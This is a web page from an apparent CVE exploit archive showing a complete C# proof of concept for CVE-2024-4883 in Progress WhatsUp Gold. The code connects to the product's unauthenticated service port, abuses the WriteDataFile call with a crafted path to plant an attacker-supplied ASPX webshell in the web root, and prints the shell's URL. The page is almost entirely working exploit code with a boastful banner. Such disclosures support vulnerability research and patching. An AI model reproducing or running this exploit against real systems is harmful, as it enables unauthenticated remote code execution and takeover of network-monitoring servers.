4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-4883
README.md
Rendering markdown...
POC / CVE-2024-4883.cs CS
⬇ Raw GitHub ✕ Close 
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using NmAPI;
using System.ServiceModel;
using WUGDataAccess.Core.DataContracts;
using System.Reflection;

namespace WhatsUpWriteDataFileExploit
{
    internal class Program
    {
        static void Main(string[] args)
        {

            string banner = @"
 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |
                                                                                    
        (*) Progress WhatsUp Gold WriteDataFile Unauthenticated Remote Code Execution (CVE-2024-4883)
        
        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
        
        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-WriteDataFile-CVE-2024-4883-RCE
        
        ";


            Console.WriteLine(banner);

            Console.WriteLine("(^_^) Prepare for the Pwnage (^_^)\r\n");

            string host = "127.0.0.1";
            int port = 9643;
            string webshell = null;

            for (int i = 0; i < args.Length; i++)
            {
                if (args[i] == "--target" && i + 1 < args.Length)
                    host = args[i + 1];
                else if (args[i] == "--port" && i + 1 < args.Length)
                    port = Int32.Parse(args[i + 1]);

                else if (args[i] == "--webshell" && i + 1 < args.Length)
                    webshell = args[i + 1];
                else if (args[i] == "--help" || args[i] == "-h" || args[i] == "/?")
                {
                    Console.WriteLine("Usage: WhatsUpWriteDataFileExploit.exe --target 192.168.0.1 --port 9643 --webshell hax.aspx");
                    return;
                }
            }


            string endpoint_address = string.Format(String.Format("net.tcp://{0}:{1}/", host, port));
            ICoreServices core_client;
            ChannelFactory<ICoreServices> core_channelFactory = new ChannelFactory<NmAPI.ICoreServices>(
            new NetTcpBinding(SecurityMode.None),
            endpoint_address
            );
            Console.WriteLine("(*) Connecting to ICoreServices " + endpoint_address);
            core_client = core_channelFactory.CreateChannel();
            Console.WriteLine("(*) Connection is ready");

            string webshell_name = Guid.NewGuid().ToString() + ".aspx";

            string webshell_path = @"C:\Program Files (x86)\Ipswitch\WhatsUp\html\NmConsole\" + webshell_name;

            EntityDataFileTransfer dataFile = new EntityDataFileTransfer
            {
                FileInfo = new EntityFileInfo
                {
                    DirectoryName = "test",
                    Name = webshell_path,
                    LastWriteTime = DateTime.Now
                },
                FileContents = System.IO.File.ReadAllBytes(webshell)
            };
            Console.WriteLine("(*) Using write what where primitive, to plant " + webshell_path);
            core_client.WriteDataFile(dataFile);

            Console.WriteLine($"(+) Webshell has been planted at https://{host}/NmConsole/"+ webshell_name);




        }
    }
}